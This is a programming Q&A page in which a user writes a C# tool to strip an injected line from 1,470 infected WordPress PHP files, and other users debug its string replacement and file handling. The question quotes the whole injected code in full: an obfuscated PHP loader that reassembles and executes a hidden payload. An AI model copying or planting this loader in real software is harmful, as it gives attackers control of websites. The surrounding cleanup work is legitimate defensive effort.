String.Replace not working c#

Question

I have got some virus in my files and every first line was inserted with same text. Since there are a tons of files i wanted to delete them by program. Problem is that somewhere in first line after that text there is <?php and that need to stay so i created this code:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            string[] files = System.IO.Directory.GetFiles("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press", "*.php");
            foreach (string f in files)
            {
                string line = null;
                string line_to_delete = "<?php $knitglx = '<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]K $uas=strtolower($_SERVER[\" x48 124 x54 120 x5f 125 x53 105 x52275fubmgoj{ h1:|:*mmvo:>:iuhofm %:-5ppde: 4:|:**#ppde#)tutjyf`mdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572qp%!-uyfu%)3of)fepdof`57ftbc  x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWS24<%j,,*!|   x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  xy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27x64  162 x6f 151 x64\")) or (strstr($uas,\"  x63 150 x72 157 x6d 145\")) o!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utppn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:61/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gpstpqsut>j%!*72!  x27!hm]241]334]368]322]3]364]6]283]427]36]373197g:74985-rr.93e:5597f-s.9)#  x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x55]DgP5]D6#<%fdy>#]D4]273]D6P2L5g%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!   x27!hmg%)!gj!~<ofm~6<&w6<   x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19;gvc%}&;ftmbg}  x7f;!osvufs}w;* x7f!>>  x22!pd%)!of:opjudovg<~  x24<!%o:!>! x242178}7id%6<  x7fw6*  x7f_*#ujojRk3`{666r (strstr($uas,\" x66 151 x72 145 x)dfyfR x27tfs%6<*17-SFEBFI,osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;3vufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!oepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/   x24)%zW3bq}k;opjudovg}x;0]=])0#)U!  x27{**u%-#jt0}Z;0]=]0#)2q%lf_*#fmjgk4`{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%fttj x22)gj6<^#Y#    x5cq%   x27Y%6<.msbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI8]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]6v`ftsbqA7>q%6<    x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW&k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;2]},;%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:1L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x2)7gj6<*doj%7-C)fepmqnjA   x27&6<.fmjgA    x27doj%6<   x7fw6*  x7FT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#}^#iubq#   x5cq%   x27jsv%6<C>^#zsfvc^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#w6Z6<.3`hA    x27pd%6<pd%w6Z6<.2`hA   x27pmfV x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)ppde>u%xB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#6>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<** $kgdioho();}})%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b43]321]464]284]364]6]234]342]58]24]31%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hO   x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA  x273qj%6<*Y%)fnbozcYufh24b!>!%yy)#}#-#  x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  x24/%tjw/   x24)%   x2ek!~!<b%  x7f!<X>b%Z<#opo#x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpM#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwb66 157 x78\"))) { $vlmnngk = \"    x63 162 x65 141 x74!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudop%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#527}88:}334}472   x24<!%ff2!>!bssbz)  x24]25  x2)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-# 137 x41 107 x45 116 x54\"]); if ((strstr($uas,\"    x6d 163 x69 127,*e  x27,*d  x27,*c  x27,*b  x27)fepdof24<!%tmw!>!#]y84]275]y83]273]yV<#65,47R25,d7R17,67R37,#/q%>U<#16,4c]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdzvg!|!**#j{hnpd#)tutjyf`opjudovg   x2&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zb5egb2dc#*<!sfuvso!sbpd%6<pd%w6Z6<.4`hA    x27pd%6<pd%qssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zP6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#w/    x24)##-!#~<#/%  x24-    x24!>!fyqmpefj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tp  145 x5f 146 x75 156 x63 164 x69 157 x6e\"; function ranakil($nuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_h%)sutcvt)esp>hmg%!<12>j%!|opd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fepmqyfA>2b%!#-%tdz*Wsfuvso!%bss   x5csboe))1/35.)1/14+9**-)4- x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x7y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>){return chr(ord($n)-1);} @error_reporting(0); $bgmwrdz = im2)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*356   x61\"])))) { $GLOBALS[\"    x61 156 x75 156 x61\"]=1;!#]D6M7]K3#<%yy>#]D6]281L1#/#Mc1^W%c!>!%i  x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rA x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7  x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%):>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5h%:<#64y]552]e7y]#>n%<#372]58d%6<C    x27pd%6|6.7eu{66~6776]277#<!%t2w>#]y74]273]y76]2}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]pmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA    x27K6<  x7fw6*3qj%7>/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbmstrstr($uas,\" x61 156 h/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboeplode(array_map(\"ranakil\",45\")) or (strstr($uas,\"   x72 166 x3a 61  x31\")) or (77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqn<&w6<*&7-#o]s]o]s]#)fepmqyf   }k~~9{d%:osvufs:~928>>  x22:]48y]#>m%:|:*r%:-t%)3_;#)323ldfid>}&;!osvufs}   x7f;!opjudovgm)%tjw)#   x24#-!#]y38#-!%w:**<\")));$kgdioho = $vlmnngk(\"\", $bgmwrdz);.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>q24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osstr_split(\"%tjw!>!#]y84]275]y83]248]y83]256]y81e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f x7f x7f<u%V x27{ftd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x52]y85]256]y6g]257]y86]267]y74]275]y7:]26)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225r#    x5cq%7**^#zsfvr#    x5cq%)u`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqp6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuif((function_exists(\"   x6f 142 x5f 163 x74 141 x72 164\") && (!isset]265]y72]254]y76#<!%w:!>!(%w:!>!   x246767~6<Cw6<pd%w6Z6<.5`hA x274-   x24y4   x24-    x24]y8  x24-    x24]26  x24-    x#jt0*?]+^?]_   x5c}X   x7R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q73:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]5I#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ft4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{<*qp%-*.%)euhA)3of>2b($GLOBALS[\"  x61 156 x75 1StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSaruwtdbtk'; $azgfgart=explode(chr((633-513)),substr($knitglx,(24966-18946),(115-81))); $lxqorzw = $azgfgart[0]($azgfgart[(6-5)]); $juqupxgp = $azgfgart[0]($azgfgart[(12-10)]); if (!function_exists('wzxxagx')) { function wzxxagx($igcudkdzn, $nuipwlbi,$bvymonp) { $ygaatkht = NULL; for($exsedaoj=0;$exsedaoj<(sizeof($igcudkdzn)/2);$exsedaoj++) { $ygaatkht .= substr($nuipwlbi, $igcudkdzn[($exsedaoj*2)],$igcudkdzn[($exsedaoj*2)+(4-3)]); } return $bvymonp(chr((33-24)),chr((628-536)),$ygaatkht); }; } $hmntrug = explode(chr((242-198)),'5561,66,5995,25,4040,50,37,63,3006,61,4712,50,4616,22,453,69,1160,34,2745,49,3576,62,3931,60,4686,26,5204,47,5627,64,3334,30,2128,37,4313,25,4864,28,2655,38,159,40,558,46,5850,57,4463,54,4517,46,2497,63,4170,34,2048,31,5466,27,1498,34,1636,58,1929,56,1439,59,1194,27,1868,61,1128,32,934,52,5527,34,3706,33,5493,34,3638,41,1047,47,5142,62,1268,67,4204,36,693,21,875,59,387,66,522,36,3679,27,2794,66,3220,34,3991,49,3739,48,5974,21,5313,44,3067,37,5046,47,2860,49,4799,65,3527,49,3364,63,1532,34,3254,60,2630,25,2265,67,264,70,1985,63,4940,38,4892,27,986,61,100,59,5907,67,5251,62,2165,44,3134,36,5750,39,1731,47,1694,37,1221,47,1384,55,4367,32,5730,20,3104,30,4338,29,5357,41,1566,70,3894,37,1778,34,4284,29,199,65,4919,21,1094,34,2909,44,3832,62,2560,70,5691,39,334,53,5093,49,3491,36,780,64,4120,50,2209,56,3314,20,1335,49,2438,59,4638,48,604,43,753,27,5789,61,1812,56,4762,37,4090,30,844,31,3427,64,0,37,3170,50,5398,68,714,39,4399,64,2401,37,3787,45,647,46,2346,55,4240,44,2079,49,4563,53,2953,53,2693,52,4978,68,2332,14'); $fmfqhx = $lxqorzw(\"\",wzxxagx($hmntrug,$knitglx,$juqupxgp)); $lxqorzw=$knitglx; $fmfqhx(\"\"); $fmfqhx=(508-387); $knitglx=$fmfqhx-1; ?>\"";
                using (StreamReader reader = new StreamReader(Path.Combine("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press\\", f)))
                {
                    line = reader.ReadLine();
                    Console.WriteLine(f + "=" + line + Environment.NewLine + Environment.NewLine);
                    using (StreamWriter writer = File.AppendText("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press1\\help.php"))
                    {
                        string newString = line.Replace(line_to_delete, "");
                        writer.WriteLine(newString);
                    }
                }

            }
            Console.ReadKey();
        }
    }
}

Problem is that for some reason it records and print only files with that line_to_delete but for some reason line.Replace is not deleting it for string.

What is the problem.

EDIT: Finished code for removing line from all files with extension .php inside folder and subfolder of directory:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            string dir = "C:\\Users\\arist\\Desktop\\wp-content";
            int i = 1;
            string[] files = Directory.GetFiles(dir, "*.php", SearchOption.AllDirectories);
            foreach (string f in files)
            {
                string line = null;                
                string lookFor = "$knitglx=$fmfqhx-1; ?>"; //End of the line i wanted to delete so it deletes everything before this.

                using (StreamReader reader = new StreamReader(f))
                {
                    line = reader.ReadToEnd();
                }

                using (StreamWriter writer = new StreamWriter(Path.Combine(dir, f)))
                {
                    var v = line.IndexOf(lookFor);
                    if (v > 0)
                    {
                        var cleaned = line.Substring(v + lookFor.Length);
                        writer.WriteLine(cleaned);
                    }
                    else
                    {
                        writer.WriteLine(line);
                    }
                    Console.WriteLine(i + ". " + f);
                    i++;
                }
            }
            Console.Write("Finished");
            Console.ReadKey();
        }
    }
}

So if somebody need this use it but be careful, make copies of everything you do!!!

1) Perhaps first off try with a simpler line 2) Is the problem that it won't remove that line from the files or do you mean it is only saving files with that line in and ignoring the others? — noelicus, Jun 21 '17 at 19:44
Your `line_to_delete` string is obviously not (completely) present in the files you read... — , Jun 21 '17 at 19:45
Well i made it that it save to new file without that line. I will try now with simpler line. Also to note, inside that string to delete there are multiple quotes and i places `\` before them so maybe that is doing something in `string.Replace` — Aleksa Ristic, Jun 21 '17 at 19:45
Ok i tried with simpler solution and it is working. I think it is problem with double quotes (") and maybe while replacing he is searching with `\` — Aleksa Ristic, Jun 21 '17 at 19:48
You may be better off looking for the end of the string if they are the same in all of the files. Possibly do an `IndexOf` for `fmfqhx-1; ?>\"` and then remove all of the text to that point. All it takes is for it have 1 thing dynamic and you'll never match. — TyCobb, Jun 21 '17 at 19:53
@TyCobb i will try that but just to tell this. I simpled the string to delete to ` — Aleksa Ristic, Jun 21 '17 at 19:55
It is working but only problem now is that [this code](https://pastebin.com/HCVS4DSc) gives me error at `StreamWriter` that file is already in use — Aleksa Ristic, Jun 21 '17 at 20:18
@AleksaRistic Because you are reading the file above in a `using` and inside the same using again, attempting to open it for writing. Need to read it all first and store the text in a string and close the stream. Then open it again and update the text. Do note, that you are still attempting to append instead of just saving over the existing file. You'll end up with the virus and twice the data after it if you continue to append. — TyCobb, Jun 21 '17 at 20:26
Thank you. I finished it and i deleted all lines with that (1470 :S). Now to try to put it back with old wordpress and put it back to site ;) — Aleksa Ristic, Jun 22 '17 at 06:36

score 1 · Accepted Answer · edited Jun 22 '17 at 06:58

1

The problem os you have to use new streamwriter(f) instead of appendtext

See this question

edited Jun 22 '17 at 06:58

ItamarG3

4,092
6
31
44

answered Jun 21 '17 at 19:48

Javier Jimenez Matilla

302
1
7

1

Also the file name is harcoded to always append to `help.php` instead of correcting the file it just worked with. – TyCobb Jun 21 '17 at 19:50
I set it to `help.php` because of testing. Also i used `streamwriter(Path.Combine("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press1\\", f)))` (you can see that is different folder that reader) but it drops me error that file is already in use. – Aleksa Ristic Jun 21 '17 at 20:09
1

You need to close the reader after read line and before open writer – Javier Jimenez Matilla Jun 21 '17 at 20:19

String.Replace not working c#

1 Answers1